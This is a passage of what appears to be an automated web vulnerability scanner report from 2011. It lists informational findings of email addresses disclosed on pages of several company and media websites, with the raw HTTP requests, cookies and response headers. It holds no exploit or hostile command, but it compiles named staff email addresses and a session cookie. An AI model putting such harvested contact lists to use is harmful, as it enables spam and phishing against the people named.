Connection: close
Date: Fri, 28 Jan 2011 14:03:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 29539

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.175. http://www.moxiesoft.com/tal_services/services.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_services/services.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

GET /tal_services/services.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:03:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28338

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.176. http://www.moxiesoft.com/tal_services/training.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_services/training.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

GET /tal_services/training.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:04:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 30222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.177. http://www.nydailynews.com/blogs/jets/2011/01/live-chat-friday-noon-1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nydailynews.com
Path:	/blogs/jets/2011/01/live-chat-friday-noon-1

Issue detail

The following email address was disclosed in the response:

blogquery@nydailynews.com

Request

GET /blogs/jets/2011/01/live-chat-friday-noon-1 HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.178. http://www.nydailynews.com/blogs/rangers/2011/01/live-chat-wednesday-at-2-pm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nydailynews.com
Path:	/blogs/rangers/2011/01/live-chat-wednesday-at-2-pm

Issue detail

The following email address was disclosed in the response:

blogquery@nydailynews.com

Request

Response

21.179. https://www.paperg.com/post.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paperg.com
Path:	/post.php

Issue detail

The following email address was disclosed in the response:

young@jtmarlin.com

Request

Response

21.180. http://www.soundingsonline.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.181. http://www.soundingsonline.com/about-us previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/about-us

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.182. http://www.soundingsonline.com/advertise previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/advertise

Issue detail

The following email addresses were disclosed in the response:

amber@soundingspub.com
c.francis@soundingspub.com
e.cirillo@soundingspub.com
f.lavigne@soundingspub.com
info@soundingspub.com
m.boyles@soundingspub.com
ryanvincent@soundingspub.com
tmarion@soundingspub.com
w.connor@soundingspub.com
wayne@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:13 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:tmarion@soundingspub.com">tmarion@soundingspub.com</a>
...[SNIP]...
<a href="mailto:f.lavigne@soundingspub.com">f.lavigne@soundingspub.com</a>
...[SNIP]...
<a href="mailto:ryanvincent@soundingspub.com">ryanvincent@soundingspub.com</a>
...[SNIP]...
<a href="mailto:wayne@soundingspub.com">wayne@soundingspub.com</a>
...[SNIP]...
<a href="mailto:amber@soundingspub.com">amber@soundingspub.com</a>
...[SNIP]...
<a href="mailto:w.connor@soundingspub.com">w.connor@soundingspub.com</a>
...[SNIP]...
<a href="mailto:m.boyles@soundingspub.com">m.boyles@soundingspub.com</a>
...[SNIP]...
<a href="mailto:c.francis@soundingspub.com">c.francis@soundingspub.com</a>
...[SNIP]...
<a href="mailto:amber@soundingspub.com">amber@soundingspub.com</a>
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.183. http://www.soundingsonline.com/archives previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/archives

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

21.184. http://www.soundingsonline.com/boat-shop previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.185. http://www.soundingsonline.com/boat-shop/know-how previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/know-how

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

21.186. http://www.soundingsonline.com/boat-shop/new-boats previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/new-boats

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.187. http://www.soundingsonline.com/boat-shop/new-gear previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/new-gear

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.188. http://www.soundingsonline.com/boat-shop/on-powerboats previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/on-powerboats

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:48 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.189. http://www.soundingsonline.com/boat-shop/on-sailboats previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/on-sailboats

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:48 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.190. http://www.soundingsonline.com/boat-shop/q-a-a previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/q-a-a

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

21.191. http://www.soundingsonline.com/boat-shop/sea-savvy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/sea-savvy

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:40 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.192. http://www.soundingsonline.com/boat-shop/tech-talk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/tech-talk

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.193. http://www.soundingsonline.com/boat-shop/used-boat-review previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/used-boat-review

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.194. http://www.soundingsonline.com/calendar previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/calendar

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:37 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.195. http://www.soundingsonline.com/career-opportunities previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/career-opportunities

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com
s.jylkka@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:s.jylkka@soundingspub.com">
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.196. http://www.soundingsonline.com/columns-blogs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/columns-blogs

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:58 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.197. http://www.soundingsonline.com/columns-blogs/bay-tripper previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/columns-blogs/bay-tripper

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:59 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.198. http://www.soundingsonline.com/columns-blogs/books previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/columns-blogs/books

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:58 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.199. http://www.soundingsonline.com/columns-blogs/new-england-fishing previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/columns-blogs/new-england-fishing

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.200. http://www.soundingsonline.com/columns-blogs/under-way previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/columns-blogs/under-way

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:57 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.201. http://www.soundingsonline.com/component/chronocontact/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/component/chronocontact/

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

21.202. http://www.soundingsonline.com/component/content/article/237622 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/component/content/article/237622

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
